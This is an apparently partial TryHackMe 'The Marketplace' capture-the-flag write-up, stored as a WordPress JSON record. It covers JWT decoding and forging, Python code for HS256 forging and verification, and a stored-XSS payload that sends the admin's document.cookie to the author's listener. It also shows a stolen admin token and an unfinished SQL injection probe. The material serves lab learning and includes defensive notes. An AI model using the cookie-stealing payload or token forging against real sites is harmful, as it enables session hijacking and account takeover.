{"id":547,"date":"2020-10-24T19:44:09","date_gmt":"2020-10-24T19:44:09","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=547"},"modified":"2020-10-24T19:44:09","modified_gmt":"2020-10-24T19:44:09","slug":"the-marketplace-writeup-tryhackme","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/10\/the-marketplace-writeup-tryhackme\/","title":{"rendered":"The Marketplace &#8211; writeup tryhackme"},"content":{"rendered":"\n<p>The Marketplace writeup (TryHackMe)<\/p>\n\n\n<pre class=\"wp-block-preformatted\">JWT found in the session cookie:\nCookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY<\/pre>\n\n\n<p>Header and payload are plain base64url, so they decode without any key:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">{\"alg\":\"HS256\",\"typ\":\"JWT\"}<br \/>{\"userId\":4,\"username\":\"moa\",\"admin\":false,\"iat\":1603184370}<\/pre>\n\n\n<p>The obvious thing to try is re-encoding the payload with <code>admin<\/code> set to <code>true<\/code>. First attempt, payload segment only ({\"userId\":4,\"username\":\"moa\",\"admin\":true,\"iat\":1603184370}):<\/p>\n\n\n<pre class=\"wp-block-preformatted\">eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0=<\/pre>\n\n\n<p>Second attempt, also changing userId and username ({\"userId\":1,\"username\":\"michael' or 1=1\",\"admin\":true,\"iat\":1603184370}), with the original signature reused:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsInVzZXJuYW1lIjoibWljaGFlbCcgb3IgMT0xIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0K.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY<\/pre>\n\n\n<p>Two things to keep in mind with these forged tokens. The third segment is an HS256 HMAC over <code>header.payload<\/code>, so any server that actually verifies it rejects a token whose payload changed while the signature did not; without the secret this only gets you in if verification is skipped. And the hand-made payload segments are not valid JWT base64url: the first ends in <code>=<\/code> padding, and the second ends in <code>MH0K<\/code>, which decodes to <code>}\\n<\/code>, a trailing newline from <code>echo<\/code> without <code>-n<\/code>. JWT segments use the base64url alphabet (<code>-<\/code> and <code>_<\/code> instead of <code>+<\/code> and <code>\/<\/code>) with padding stripped.<\/p>\n\n\n<p>Since I also found an XSS in item listings (stored, as the payload is saved with the item) and there is a feature to report items to the admins, which an admin account processes automatically, we can steal the admin's cookie. 
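As an added example (not code from the writeup), the token handling above in Python: decoding header and payload without any key, forging an admin=true payload with the original signature the way the post does, showing why a server that verifies the HS256 MAC rejects it, and flagging the padding and newline mistakes in the hand-made segments. The signing secret in the block is invented, since the server's real secret is unknown.

```python
"""Added example: JWT decode, forge-with-old-signature, proper HS256 signing
and verification, and a check for the malformed segments in the post.
The ORIGINAL_TOKEN is the one captured in the writeup; DEMO_SECRET is a
stand-in for the unknown server key."""
import base64
import hashlib
import hmac
import json

ORIGINAL_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9."
    "cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY"
)
DEMO_SECRET = b"not-the-real-secret"  # assumption: the real HS256 key is unknown


def b64url_decode(segment: str) -> bytes:
    """JWT segments drop the '=' padding; add it back before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    """Inverse: urlsafe alphabet, padding stripped (what 'echo | base64' gets wrong)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def compact_json(obj: dict) -> bytes:
    """JWT libraries emit JSON without spaces; this reproduces the original segments byte for byte."""
    return json.dumps(obj, separators=(",", ":")).encode()


def decode_jwt(token: str) -> tuple[dict, dict]:
    """Return (header, payload) without checking the signature: both are plaintext."""
    h, p, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a properly formed HS256 token: HMAC-SHA256 over 'header.payload'."""
    h = b64url_encode(compact_json(header))
    p = b64url_encode(compact_json(payload))
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(mac)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """What a correctly implemented server does before trusting the 'admin' claim."""
    h, p, sig = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def forge_with_old_signature(token: str, **changes) -> str:
    """The writeup's approach: swap claims in the payload, keep the original signature."""
    h, p, sig = token.split(".")
    payload = json.loads(b64url_decode(p))
    payload.update(changes)
    return f"{h}.{b64url_encode(compact_json(payload))}.{sig}"


def segment_problems(segment: str) -> list[str]:
    """Why the two hand-made payload segments in the post are not valid JWT segments."""
    problems = []
    if segment.endswith("="):
        problems.append("base64 padding present")
    if "+" in segment or "/" in segment:
        problems.append("standard base64 alphabet, not base64url")
    if b64url_decode(segment.rstrip("=")).endswith(b"\n"):
        problems.append("trailing newline in payload (echo without -n)")
    return problems


if __name__ == "__main__":
    header, payload = decode_jwt(ORIGINAL_TOKEN)
    print("header:", header)
    print("payload:", payload)
    forged = forge_with_old_signature(ORIGINAL_TOKEN, admin=True)
    print("forged payload:", decode_jwt(forged)[1])
    # Re-sign the real claims with the demo key, then show the forgery fails against that key.
    legit = sign_hs256(header, payload, DEMO_SECRET)
    print("legit verifies:", verify_hs256(legit, DEMO_SECRET))
    print("forged verifies:", verify_hs256(forge_with_old_signature(legit, admin=True), DEMO_SECRET))
    print("post's segments:", segment_problems("eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOnRydWUsImlhdCI6MTYwMzE4NDM3MH0="))
```

Running it prints the decoded claims, then a verification that succeeds for the properly signed token and fails for the payload-swapped one; the forged token it builds is what the post's second cookie would look like with the payload encoded correctly.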
I&#8217;m running a cookie stealer and injected<\/p>\n\n\n<pre class=\"wp-block-preformatted\">\"&gt;&lt;script&gt;var i=new Image;i.src=\"http:\/\/ip:8888\/?\"+document.cookie;&lt;\/script&gt;<\/pre>\n\n\n<p>(submitted URL-encoded, so the spaces become <code>+<\/code>; <code>ip<\/code> is the listener address) as a new item. The leading <code>\"&gt;<\/code> closes the attribute and tag the item text lands in, and the <code>Image<\/code> request ships <code>document.cookie<\/code> to my listener as the query string. Once the admin bot opened the report, my stealer got loot:<\/p>\n\n\n<p>kali@kali:~\/tools$ python cookiestealer.py<br \/>Started http server<\/p>\n\n\n<pre class=\"wp-block-preformatted\">2020-10-20 05:43 AM - 10.10.78.239 Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) HeadlessChrome\/85.0.4182.0 Safari\/537.36<\/pre>\n\n\n<pre class=\"wp-block-preformatted\">token ['eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MDMxODcwMDl9.V_7aVbdmO7438VdqJiIkczotl0TljZupDQvaQwhNy5o']<\/pre>\n\n\n<p>The User-Agent (HeadlessChrome) confirms the reports are handled by an automated browser, and the token's payload decodes to {\"userId\":2,\"username\":\"michael\",\"admin\":true,\"iat\":1603187009}: a validly signed admin session, no forging needed. That it was readable from <code>document.cookie<\/code> at all means the cookie was set without <code>HttpOnly<\/code>. Using that token got the first flag \ud83d\ude42 THM{xxx}<\/p>\n\n\n<pre class=\"wp-block-preformatted\">SQLi found in http:\/\/10.10.8.75\/xxx\n%3b%20execute%20immediate%20'sel'%20%7c%7c%20'ect%20us'%20%7c%7c%20'er'\n(decoded: ; execute immediate 'sel' || 'ect us' || 'er')<\/pre>\n\n\n<pre class=\"wp-block-code\"><code>&lt;h2&gt;Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; execute immediate 'sel' || 'ect us' || 'er'' at line 1&lt;\/h2&gt;<\/code><\/pre>\n\n\n<pre class=\"wp-block-preformatted\">HTTP\/1.1 500 Internal Server Error\nServer: nginx\/1.19.2\nDate: Sat, 24 Oct 2020 18:18:12 GMT\nContent-Type: text\/html; charset=utf-8\nContent-Length: 757\nConnection: close\nX-Powered-By: Express\nETag: W\/\"2f5-drQF\/DLtuZWnrPXCr3lYSPJxZX0\"<\/pre>\n\n\n<p>A second error from the same parameter leaves only a single quote as the unparsed text, which is what a stray <code>'<\/code> inside a quoted string literal produces, so the input lands inside quotes:<\/p>\n\n\n<pre class=\"wp-block-preformatted\">Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<\/pre>\n\n\n<p>Two notes before exploiting it. The error is verbose (ER_PARSE_ERROR, \"MySQL server version\", X-Powered-By: Express), so the backend is MySQL behind a Node\/Express app; <code>EXECUTE IMMEDIATE<\/code> and <code>||<\/code> string concatenation are Oracle syntax and will not work here. In MySQL <code>||<\/code> is logical OR unless PIPES_AS_CONCAT is set (use <code>CONCAT()<\/code>), and the Node mysql drivers refuse stacked <code>;<\/code> queries unless <code>multipleStatements<\/code> is enabled, so this needs MySQL-style injection (UNION, error- or boolean-based) instead. Still to be exploited\u2026 TBC<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Marketplace writeup (TryHackMe) JWT found in the session cookie: Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibW9hIiwiYWRtaW4iOmZhbHNlLCJpYXQiOjE2MDMxODQzNzB9.cHhTfERXZoGvHZu5wEFEqRN5paZc6FZIH8AUPVFcHsY Header and payload are plain base64url, so they decode without any key: {&#8220;alg&#8221;:&#8221;HS256&#8243;,&#8221;typ&#8221;:&#8221;JWT&#8221;}{&#8220;userId&#8221;:4,&#8221;username&#8221;:&#8221;moa&#8221;,&#8221;admin&#8221;:false,&#8221;iat&#8221;:1603184370} The obvious thing to try is re-encoding the payload with admin set to true. &#8230; <a title=\"The Marketplace &#8211; writeup tryhackme\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/10\/the-marketplace-writeup-tryhackme\/\">Read more<span class=\"screen-reader-text\">The Marketplace &#8211; writeup tryhackme<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-547","post","type-post","status-publish","format-standard","hentry","category-blah"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=547"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/547\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}